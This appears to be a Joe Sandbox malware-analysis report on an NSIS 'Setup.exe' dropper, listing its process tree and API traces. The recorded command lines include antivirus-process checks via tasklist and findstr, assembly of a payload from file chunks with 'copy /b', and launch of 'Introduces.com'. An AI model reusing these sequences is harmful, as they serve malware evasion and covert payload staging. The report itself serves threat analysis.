2024-12-08 00:38:56 UTC	1004	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 00:38:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n8qlsii0ii9lap00omf4pke114; expires=Wed, 02-Apr-2025 18:25:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDHhSys20y99lIrIJU4WqsllXRTjbjTrysKU46MTlTGhDdQaBijtlnh%2B%2B1mJgcBK1SwX2xHcuyfVrUUAjUYElXEvw9enduntvdIryBtYyZviY7QjeCpOs080kBhD84b9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ee8b2009bd242dd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1587&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=904&delivery_rate=1800246&cwnd=186&unsent_bytes=0&cid=60b7a7371b5a7938&ts=1968&x=0"
2024-12-08 00:38:56 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-08 00:38:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	19:37:14
Start date:	07/12/2024
Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x400000
File size:	73'410'092 bytes
MD5 hash:	35874E6F90E4B9B6DB01D06DDC711F2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:37:15
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Were Were.cmd && Were.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:37:15
Start date:	07/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	19:37:16
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x990000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	19:37:16
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xa80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:37:16
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x990000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	19:37:16
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xa80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:37:17
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 485687
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:37:17
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "ADDITIONALLYPURCHASEDNEWLYLAUNDRYASSISTSHELPLESWRIGHT" Permitted
Imagebase:	0xa80000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:37:17
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\College + ..\Shelter + ..\Defects + ..\Populations + ..\Alive + ..\Bus k
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	19:37:17
Start date:	07/12/2024
Path:	C:\Users\user\AppData\Local\Temp\485687\Introduces.com
Wow64 process (32bit):	true
Commandline:	Introduces.com k
Imagebase:	0x9f0000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	19:37:17
Start date:	07/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xcf0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	28

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424576,74DF23A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C

Strings

NCRC, xrefs: 004039A8
/D=, xrefs: 004039D2
_?=, xrefs: 00403A90
Error launching installer, xrefs: 00403AA9
SeShutdownPrivilege, xrefs: 00403C42
NSIS Error, xrefs: 0040390E
\Temp, xrefs: 00403A47
~nsu.tmp, xrefs: 00403B23

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

SetFileAttributes: "%s":%08X, xrefs: 0040177B
detailprint: %s, xrefs: 00401679
SetFileAttributes failed., xrefs: 004017A1
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Aborting: "%s", xrefs: 0040161D
Call: %d, xrefs: 0040165A
Rename failed: %s, xrefs: 0040194B
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
CreateDirectory: "%s" created, xrefs: 00401849
Rename: %s, xrefs: 004018F8
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
BringToFront, xrefs: 004016BD
Sleep(%d), xrefs: 0040169D
CreateDirectory: "%s" (%d), xrefs: 004017BF
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Jump: %d, xrefs: 00401602

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

"F, xrefs: 00405A4B
RichEdit20A, xrefs: 00405BE2, 00405BE7
.DEFAULT\Control Panel\International, xrefs: 004059C5
@jG, xrefs: 00405AF2
.exe, xrefs: 00405A69
Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
F, xrefs: 00405A22
_Nb, xrefs: 00405AFD
RichEd20, xrefs: 00405BC9
RichEdit, xrefs: 00405BF0
RichEd32, xrefs: 00405BD4

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
